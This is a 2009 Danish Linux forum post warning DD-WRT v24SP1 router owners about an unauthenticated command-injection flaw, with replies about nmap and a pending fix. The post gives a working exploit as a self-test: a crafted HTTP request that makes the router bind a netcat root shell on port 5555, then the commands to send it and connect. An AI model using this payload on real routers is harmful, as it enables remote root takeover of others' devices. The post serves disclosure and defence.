• Opret dig
  • Glemt adgangskode

User account menu

  • Artikler
  • Forside
  • Forum
  • Nyheder
  • Log ind
Hjem
LinuxIN.dk

Snak med

Opret dig!

Af Anonym7 | 21.07.2009 13:20

Advarsel til DD-WRT brugere

Løst og fast
For nogen tid siden begyndte man at spekulere ikke i penetrationen af en persons PC men snarere de routere som vendte ud mod omverdenen.

Mange har fejlagtigt den tro, at fordi en router i nogen grad kan betragtes som en HW-firewall så er den hellige grav vel forvaret.

Nu er der så fundet et meget groft hul i det populare DD-WRT firmware:
http://www.milw0rm.com/exploits/9209

Kort fortalt:
Dette exploit benytter DD-WRT v24SP1 som er den nyeste DD-WRT udgivelse der er tilgængelig - vha. en række forseelser i firmware koden deriblandt:
1) Man kan sende kommandoer til routeren via nettet - uden autorisation
2) httpd serveren (som eksekverer kommandoen) kører som root

Står man altså i den situation, at en person i dit LAN kan overtage routeren fuldstændigt - ligeledes kunne en specielt konstrueret hjemmeside også resultere i at du (uden at vide det) sendte de nødvendige kommandoer for at åbne op til routeren udefra.


Ville bare lige advare andre der også ligger inde med DD-WRT routere da de har en vis popularitet!

PPS!
Jeg har testet på min v24SP1 router og det virker fint - dog kan jeg ikke umiddelbart bruge det mod min DD-WRT v23SP2 router.
Begge de testede routere er af mærket Linksys WRT54GL (selvom dette ikke burde have en indvirkning)

Test din router
Lav en ny tekstfil

GET /cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh HTTP/1.0
Host:192.168.2.2

Hvor 192.168.2.2 erstattes af din routers IP

Således åbnes porten:

cat evil-ddwrt-req | nc 192.168.2.2 80

Igen, erstat 192.168.2.2 med din routers ip

Således får du adgang til din root shell:

nc 192.168.1.1 5555


Som man kan se sender man simpelthen en forespørgsel til routeren om at netcat skal lytte på port 5555 efter forbindelser og eksekvere /bin/sh når forbindelsen oprettes - resultatet er at når du forbinder har du en root shell at lege med.

  • Log ind eller opret dig for at tilføje kommentarer

Kommentarer4

# 1

15 år 11 måneder siden

Permalink

Indsendt af Anda den 21. juli 2009 kl. 15:49

Permalink

Re: Advarsel til DD-WRT brugere

Et lille skridt i mod bedre sikkerhed er vel at sætte routeren til ikke at lytte på port 80?

EDIT:
Måske ikke alligevel - Legede lige lidt med nmap.
Hvad vil det sige at der er en filtered port?
  • Log ind eller opret dig for at tilføje kommentarer

# 2

15 år 11 måneder siden

Permalink

Indsendt af mich den 22. juli 2009 kl. 00:17

Permalink

Re: filtered port

#1
D.v.s. at nmap ikke kan afgøre, om porten er åben, fordi f.eks. en firewall forhindrer pakken i at nå porten. Se 'man nmap', 'Port scanning basics'.
  • Log ind eller opret dig for at tilføje kommentarer

# 3

15 år 11 måneder siden

Permalink

Indsendt af m_abs den 25. juli 2009 kl. 12:03

Permalink

Re: Advarsel til DD-WRT brugere

Jeg har lige prøvet det på min router mener den har v23sp2 og her virkede det også.

Tid til en opgradering. :)
  • Log ind eller opret dig for at tilføje kommentarer

# 4

15 år 11 måneder siden

Permalink

Indsendt af carlo den 2. august 2009 kl. 17:03

Permalink

Re: Advarsel til DD-WRT brugere

Bare til info så er der en midlertidig opdatering!!
  • Log ind eller opret dig for at tilføje kommentarer

Svar søges

llumos Unix-operativsystem, 0
Den er go 0
14. februar = I Love Free Software Day 0
Lokal fil-deling - for de dovne. 0
Linux fra begynder til professionel af O'Reilly 0

Seneste aktivitet

En snak om Linux-kompatibel software 7
Nulstilling af adgangskode 6
Virtuel maskine? 2
PCLinuxOS 27
Gode anmeldelser Zorin OS 17.3 3
Open Source-eksperimentet 3
"Intet realistisk alternativ" - mig i r*ven 15
Ingen Mint 5
Linux App Store Flathub når 3 milliarder downloads 2
Digitaliseringsministeriet sætter gang i pilotprojekt om digital suverænitet 3
Mest sikker webbrowser 5
Firefox 2
Privatbeskeder 7
Backup/synkronisering? 3
BigLinux 5
Chatgpt satire 1
Læsning af databasefil i Firefox 2
Vanilla OS 15
Pepsi Challenge 4
Linuxin er nu migreret til Drupal 11 13

© 2025 Linuxin og de respektive skribenter

Oprettet og drevet af nørder siden 2004 !